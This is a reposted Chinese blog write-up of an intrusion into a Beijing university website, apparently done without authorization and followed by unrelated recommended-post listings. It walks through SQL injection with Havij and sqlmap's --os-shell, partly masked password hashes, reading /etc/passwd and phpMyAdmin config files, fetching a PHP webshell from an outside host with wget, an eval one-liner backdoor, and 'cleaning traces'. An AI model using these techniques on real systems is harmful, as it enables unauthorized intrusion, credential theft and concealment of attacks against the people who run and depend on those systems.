友情检测北京某大学网站
友情检测北京某大学网站
0×00信息收集
无意中发现了个注入链接,到底怎么发现的我也不知道,反正不是扫的。
http://www.2cto.com /xxxxxx?id=12
谷歌找到后台
site:f4ck.edu.cninurl:admin
http://www.2cto.com /xxx/xxx.php
0×01账号密码获取
先利用注入点。
丢进Havij跑出数据库
跑出数据库账号密码
如图
破解admin密码失败,如图
然后破解其他的用户,获得密码为123xxxxx登陆后,无可以利用地方,如
查看其他的超级管理员,密码都没有破解成功,其中一个cmd5显示破解成功,但需购买,但
实际是即使购买,它会提示没法破解。我擦。如图
继续。看见mysql
读取账号密码信息,又发现了phpmyadmin
先读取mysql的用户密码信息
Data
Found:
User=xxx
Data
Data
Data
Data
Data
Found:
Found:
Found:
Found:
Found:
Password=*3A3DAA719C86DA543FF1A9E27DB6E59xxxxxxxxx
User=pku_xxx
Password=*3EDC2D4C98204DC580FCE638B8B3FA7xxxxxxxxx
User=root
Password=*EF9C0D7D80D1B158F3958176F869AAC9xxxxxxxx
查root密码时候又是提示购买,要购买时又提示无法解密。Fuck啊。
0×02转战phpmyadmin
后台传shell无望,转战phpmyadmin
在网站后添加phpmyadmin如图
输了几个常用的账号密码没结果。再看看那个读文件的功能
如图,可以读出/etc/passwd文件的内容
如图G-7
之后就是看看能能知道默认的配置文件,依据服务器信息如图G-8,判断是Apache之后填写
默认的安装目录,默认的默认配置文件,
读/etc/issue获得操作系统Ubuntu10.10\n\l
读/usr/local/apache/conf/httpd.conf失败
读/usr/local/apache/conf/httpd.conf失败
工具都提示Iamidle….。
然后就继续打算猜目录了,phpmyadmin爆路径,但都没爆出,这个phpmyadmin貌似有点怪。
然后Google
site:www.2cto.com warning:
site:www.2cto.com error:
也没搞到。然后就是拼人品。
0×03发现xampp
user
听着《第一首情歌》,继续。
忽然看到那个phpmyadmin的登陆界面中有
然后搜索获得xampp默认安装信息如图G-9
xamppuser
如图f的那样。
File/Directory
Purpose
/opt/lampp/bin/
/opt/lampp/htdocs/
/opt/lampp/etc/httpd.con
f/opt/lampp/etc/my.cnf
/opt/lampp/etc/php.ini
/opt/lampp/etc/proftpd.c
onf
/opt/lampp/phpmyadmin/co
nfig.inc.php
TheXAMPPcommandshome./opt/lampp/bin/mysqlcallsfor
exampletheMySQLmonitor.
TheApacheDocumentRootdirectory.
TheApacheconfigurationfile.
TheMySQLconfigurationfile.
ThePHPconfigurationfile.
TheProFTPDconfigurationfile.(since0.9.5)
ThephpMyAdminconfigurationfile.
读文件
读/opt/lampp/phpmyadmin/config.inc.php
获得信息如图G-10
$cfg['Servers'][$i]['user']
=’root’;
$cfg['Servers'][$i]['password']
=’91xxxx’;
不过它的亮点是commentskey啦啦啦。。
果断连接phpmyadmin,然后我擦哇,输入没反应,这个是个啥子情况。
然后继续读文件,看能读到配置文件不。
读/opt/lampp/htdocs/index.php
找到配置文件,
如图G-11
第60页共633页
继续读/opt/lampp/htdocs/inc/conn.php
没密码哇哈哈。
之后可以写一句话木马文件进去,但是pangolin没写入。
Itsaidthetargetmustsetmagic_quotes_gpctooff
执行数据库查询语句
select”intooutfile’/opt/lampp/htdocs/fuck.php’
失败
0×04拿起Sqlmap
然后想起了sqlmap它弹个shell出来。
命令:sqlmap.py-u”http://www.2cto.com /xxx.php?id=12″–os-shell
输入web路径/opt/lampp/htdocs/之后弹出的shell,如图G-12
查看whoami
如图G-13
lscat命令可以执行cdvi等命令都没法执行
列目录时输入ls/则命令成功
之后发现可以利用wget命令,但是很明显弱智了,直接wgethttp://fuck.uk/a.php额。。
然后直接wget
Cata.txt
结果为
http://fuck.uk/a.txt
之后,发现没法重命名,试了下,wget个rar文件,然后解压也不行。额。。其实cp
可以执行的,直接cpa.txta.php就成功啦。菜刀连接,失败。。Fuck。。。。
之后看了下一句话
而如果php设置文件中的
和mv是
short_open_tag是open的话才可以使用
重新wget之后如图
G-14
?>
所以最好用
eval($_request[fuck])?>
菜刀连接如图G-15
Ok….提权啥子的先不搞了。
0×05敏感信息收集
搜索各种账号密码信息,清理痕迹
suggestion
no suggestion
—————————————————————————————————————
本次实战渗透总结经验:
1.用扫描SQL注入工具找到了注入点:http://f4ck.edu.cn /xxxxxx?id=12
2.site:f4ck.edu.cn inurl:admin //用GOOGLE语法找到网站后台
3.把注入点放到havj里面跑跑,跑出了几个密码,试了几个密码都没用
4.再看看PHPmysql数据库配置信息,看到了用户名和密码(MD5加密了的)结果都没破解出来;
5.放到stuctr2工具中的文件读取中输入:/etc/passwd //查看各种密码以及得到服务器的各种路径信息
6./etc/issue (读取服务器信息)/usr/local/apache/conf/httpd.con 查看apche服务器的配置
7.用goole黑客语句:site:f4ck.edu.cn warning: site:f4ck.edu.cn error:
8.用sqlmap语句:sqlmap.py-u”http://f4ck.edu.cn /xxx.php?id=12″–os-shell //sqlmap中弹出SHELL反弹
本文固定链接:http://www.backlion.com/%e5%8f%8b%e6%83%85%e6%a3%80%e6%b5%8b%e5%8c%97%e4%ba%ac%e6%9f%90%e5%a4%a7%e5%ad%a6%e7%bd%91%e7%ab%99/ | backion渗透测试研究中心
友情检测北京某大学网站相关推荐
- 北京化工大学2018年10月程序设计竞赛部分题解(A,C,E,H)
目录 北京化工大学2018年10月程序设计竞赛部分题解(A,C,E,H) 竞赛事件相关 竞赛链接 竞赛题目 总结 北京化工大学2018年10月程序设计竞赛部分题解(A,C,E,H) 竞赛事件相关 竞赛 ...
- 对北京大学红旗在线的一次友情检测
对北京大学红旗在线的一次友情检测 <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office&qu ...
- 【渗透笔记】友情检测朋友公司并拿下shell过程
一朋友在一个百货公司上班,由于无聊危险漫步就友情检测了他们公司的网站,开始我们的检测之旅吧. 打开网站,发现网站挺不错,不愧是大卖场,页面做的挺花,但是安全性怎么样呢?来试试吧.先用工具扫了下后台,结 ...
- 895计算机专业基础,北京工业大学2020年考研895计算机学科专业基础考试大纲
考研大纲是考研学生复习的重要参考资料,它指出了所考科目的大致考试范围,也是考研命题的重要参考依据.2020考研大纲已经陆续公布,包括公共课考试大纲和专业课统考科目考试大纲,而自命题科目考试大纲则一般由 ...
- 北京化工大学计算机调剂学院,北京化工大学2018年考研调剂信息
2018考研初试之后,有些考生可能觉得自己考得不理想,对于目标院校没有太大把握,那么这个时候你就需要及时关注一下调剂信息,先人一步做好调剂的准备.下面是研招网小编为大家整理的北京化工大学2018年考研 ...
- 北京化工大学 计算机专硕 缺额,北京化工大学2020年硕士研究生调剂工作办法
一.调剂基本要求 为促进硕士研究生招生复试工作的规范化和制度化,科学选拔人才,秉承公平公正.公开的要求,根据<教育部关于印发2020年全国硕士研究生招生工作管理规定的通知><教育部办 ...
- 双非计算机专业研究团队,就业有多好?北京语言大学SAIT智能语音习得技术实验室...
之前我在找计算机专业信息的时候,发现某些大学的实验室发布的信息,带有一些实验室的相关信息的介绍. 比如这次要说的北京语言大学SAIT智能语音习得技术实验室,不仅写了团队,师资,还把往届师兄师姐的就业信 ...
- 北京石油大学C语言设计第二次作业,北京石油大学机器人设计第二次在线作业...
北京石油大学机器人设计第二次在线作业 (9页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦! 11.90 积分 第二次在线作业窗体顶端单选题 (共25道题)收 ...
- 北京语言大学计算机调剂,北京语言大学2019考研调剂通知
考研调剂信息:考研调剂主要是给考研初试成绩不太理想的同学们继续进行研究生学历深造的机会,如果需要进行调剂,目标是调剂到一个差不多的学校,需要你根据自己的分数和要调剂院校的复试情况,及结合该院校的调剂信 ...
最新文章
- nowcoder119E A Simple Problem
- 【问题排查】fastjson线上排坑记
- LeetCode Water and Jug Problem(巧妙转换为gcd问题)
- 网易云 IM SDK 4.2.0版本逆袭升级!
- no module named social_django
- python中三种分支结构的_python 运算符与分支结构
- Java IO 系统
- [SCOI2009]围豆豆
- c语言输出最小值流程图,C语言实用程序设计100例流程图
- android smb同步,SMBsync安卓下最好的同步备份工具
- etc门架系统服务器是什么,ETC门架是什么东西?ETC龙门架作用
- 光纤耦合系统的公差分析
- POJ 3067 Japan【树状数组】
- android 笔试题大全,2018年Android面试题大全
- tomcat之配置文件详解
- 常用抓包工具,手机调试工具大合集
- 软件发展新方向-新技术革命
- wpf DataGrid 操作列多个操作项
- 《黑客与画家》读后感——黑客与画家
- 计算机网络原理【四】之 网络层
热门文章
- 【Shell】 sed/tr替换换行符
- python打印大写字母_Python: 打印出大写字符C
- 最短路径算法 | Bellman-Ford Algorithm
- 关闭PyCharm的Run with Python Console模式
- 比较大小教案计算机小朋友们,一年级数学下册第单元教案.doc
- 例说游戏角色设计与角色文化内涵的关系
- 在Redhat9上安装Oracle 9.2
- 记-玩吧-一次失败的面试
- CentOS 6.3安装chrome
- 实现微信打开网页时,获取当前微信用户信息(Java)(基于snsapi_userinfo方式)